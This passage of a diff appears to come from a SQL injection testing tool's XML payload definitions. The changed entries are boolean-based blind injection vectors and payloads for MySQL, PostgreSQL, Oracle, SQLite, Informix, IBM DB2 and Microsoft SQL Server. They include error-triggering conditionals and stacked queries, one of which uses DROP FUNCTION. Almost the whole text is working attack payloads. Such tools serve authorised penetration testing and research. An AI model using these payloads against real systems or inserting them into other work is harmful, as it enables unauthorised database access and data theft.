+            <comparison>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)</comparison>
         </response>
         <details>
             <dbms>MySQL</dbms>
@@ -469,104 +503,155 @@ Tag: <test>
     </test>
 
     <test>
-        <title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
+        <title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
         <stype>1</stype>
         <level>5</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,8</clause>
         <where>2</where>
-        <vector>OR ([INFERENCE])*[RANDNUM]</vector>
+        <vector>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)</vector>
         <request>
-            <payload>OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
+            <payload>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)</payload>
         </request>
         <response>
-            <comparison>OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
+            <comparison>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)</comparison>
         </response>
         <details>
             <dbms>MySQL</dbms>
         </details>
     </test>
+
+    <test>
+        <title>PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,8</clause>
+        <where>1</where>
+        <vector>AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</vector>
+        <request>
+            <payload>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</payload>
+        </request>
+        <response>
+            <comparison>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</vector>
+        <request>
+            <payload>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</payload>
+        </request>
+        <response>
+            <comparison>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</vector>
+        <request>
+            <payload>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</payload>
+        </request>
+        <response>
+            <comparison>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</comparison>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</vector>
+        <request>
+            <payload>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</payload>
+        </request>
+        <response>
+            <comparison>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</comparison>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</vector>
+        <request>
+            <payload>AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</payload>
+        </request>
+        <response>
+            <comparison>AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</comparison>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</vector>
+        <request>
+            <payload>OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</payload>
+        </request>
+        <response>
+            <comparison>OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</comparison>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+        </details>
+    </test>
+
     <!-- End of boolean-based blind tests - WHERE or HAVING clause -->
 
     <!-- Boolean-based blind tests - Parameter replace -->
     <test>
-        <title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace</title>
+        <title>Boolean-based blind - Parameter replace (original value)</title>
         <stype>1</stype>
         <level>1</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</vector>
         <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</payload>
         </request>
         <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</comparison>
         </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
-        </request>
-        <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0 boolean-based blind - Parameter replace</title>
-        <stype>1</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
-        </request>
-        <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&lt; 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0 boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
-        </request>
-        <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&lt; 5.0</dbms_version>
-        </details>
     </test>
 
     <test>
@@ -778,7 +863,6 @@ Tag: <test>
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -799,7 +883,6 @@ Tag: <test>
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -841,6 +924,44 @@ Tag: <test>
         </details>
     </test>
 
+    <test>
+        <title>Informix boolean-based blind - Parameter replace</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</comparison>
+        </response>
+        <details>
+            <dbms>Informix</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Informix boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</comparison>
+        </response>
+        <details>
+            <dbms>Informix</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Microsoft Access boolean-based blind - Parameter replace</title>
         <stype>1</stype>
@@ -879,44 +1000,6 @@ Tag: <test>
         </details>
     </test>
 
-    <test>
-        <title>SAP MaxDB boolean-based blind - Parameter replace</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
-        <request>
-            <payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
-        </request>
-        <response>
-            <comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
-        </response>
-        <details>
-            <dbms>SAP MaxDB</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
-        <request>
-            <payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
-        </request>
-        <response>
-            <comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
-        </response>
-        <details>
-            <dbms>SAP MaxDB</dbms>
-        </details>
-    </test>
-
     <!-- Works in MySQL, Oracle, etc. -->
     <test>
         <title>Boolean-based blind - Parameter replace (DUAL)</title>
@@ -935,7 +1018,7 @@ Tag: <test>
     </test>
 
     <test>
-        <title>Boolean-based blind - Parameter replace (DUAL) (original value)</title>
+        <title>Boolean-based blind - Parameter replace (DUAL - original value)</title>
         <stype>1</stype>
         <level>3</level>
         <risk>1</risk>
@@ -951,6 +1034,40 @@ Tag: <test>
     </test>
     <!-- End of boolean-based blind tests - Parameter replace -->
 
+    <!-- Works in SAP MaxDB, Informix, etc. -->
+    <test>
+        <title>Boolean-based blind - Parameter replace (CASE)</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
+        <request>
+            <payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
+        </request>
+        <response>
+            <comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
+        </response>
+    </test>
+
+    <test>
+        <title>Boolean-based blind - Parameter replace (CASE - original value)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
+        <request>
+            <payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
+        </request>
+        <response>
+            <comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
+        </response>
+    </test>
+    <!-- End of boolean-based blind tests - Parameter replace -->
+
     <!-- Boolean-based blind tests - ORDER BY, GROUP BY clause -->
     <test>
         <title>MySQL &gt;= 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>
@@ -959,12 +1076,12 @@ Tag: <test>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</vector>
         <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</payload>
         </request>
         <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</comparison>
         </response>
         <details>
             <dbms>MySQL</dbms>
@@ -979,12 +1096,12 @@ Tag: <test>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</vector>
         <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</payload>
         </request>
         <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</comparison>
         </response>
         <details>
             <dbms>MySQL</dbms>
@@ -999,12 +1116,12 @@ Tag: <test>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</vector>
         <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</payload>
         </request>
         <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</comparison>
         </response>
         <details>
             <dbms>MySQL</dbms>
@@ -1019,12 +1136,12 @@ Tag: <test>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</vector>
         <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</payload>
         </request>
         <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</comparison>
         </response>
         <details>
             <dbms>MySQL</dbms>
@@ -1113,7 +1230,6 @@ Tag: <test>
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -1134,7 +1250,6 @@ Tag: <test>
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -1251,6 +1366,61 @@ Tag: <test>
             <dbms>SAP MaxDB</dbms>
         </details>
     </test>
+
+    <test>
+        <title>IBM DB2 boolean-based blind - ORDER BY clause</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>3</clause>
+        <where>1</where>
+        <vector>,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</vector>
+        <request>
+            <payload>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</comparison>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 boolean-based blind - ORDER BY clause (original value)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>3</clause>
+        <where>1</where>
+        <vector>,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</vector>
+        <request>
+            <payload>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</comparison>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <!-- Works in MySQL, Oracle, etc. -->
+    <test>
+        <title>HAVING boolean-based blind - WHERE, GROUP BY clause</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2</clause>
+        <where>1</where>
+        <vector>HAVING [INFERENCE]</vector>
+        <request>
+            <payload>HAVING [RANDNUM]=[RANDNUM]</payload>
+        </request>
+        <response>
+            <comparison>HAVING [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
     <!-- End of boolean-based blind tests - ORDER BY, GROUP BY clause -->
 
     <!-- Boolean-based blind tests - Stacked queries -->
@@ -1259,15 +1429,15 @@ Tag: <test>
         <stype>1</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
-        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</vector>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</vector>
         <request>
-            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</payload>
+            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</payload>
             <comment>#</comment>
         </request>
         <response>
-            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</comparison>
+            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</comparison>
         </response>
         <details>
             <dbms>MySQL</dbms>
@@ -1280,15 +1450,15 @@ Tag: <test>
         <stype>1</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
-        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</vector>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</vector>
         <request>
-            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</payload>
+            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</payload>
             <comment>#</comment>
         </request>
         <response>
-            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</comparison>
+            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</comparison>
         </response>
         <details>
             <dbms>MySQL</dbms>
@@ -1301,7 +1471,7 @@ Tag: <test>
         <stype>1</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
         <request>
@@ -1322,7 +1492,7 @@ Tag: <test>
         <stype>1</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1</vector>
         <request>
@@ -1342,7 +1512,7 @@ Tag: <test>
         <stype>1</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
         <request>
@@ -1355,7 +1525,6 @@ Tag: <test>
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -1364,7 +1533,7 @@ Tag: <test>
         <stype>1</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)</vector>
         <request>
@@ -1377,7 +1546,6 @@ Tag: <test>
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -1386,7 +1554,7 @@ Tag: <test>
         <stype>1</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
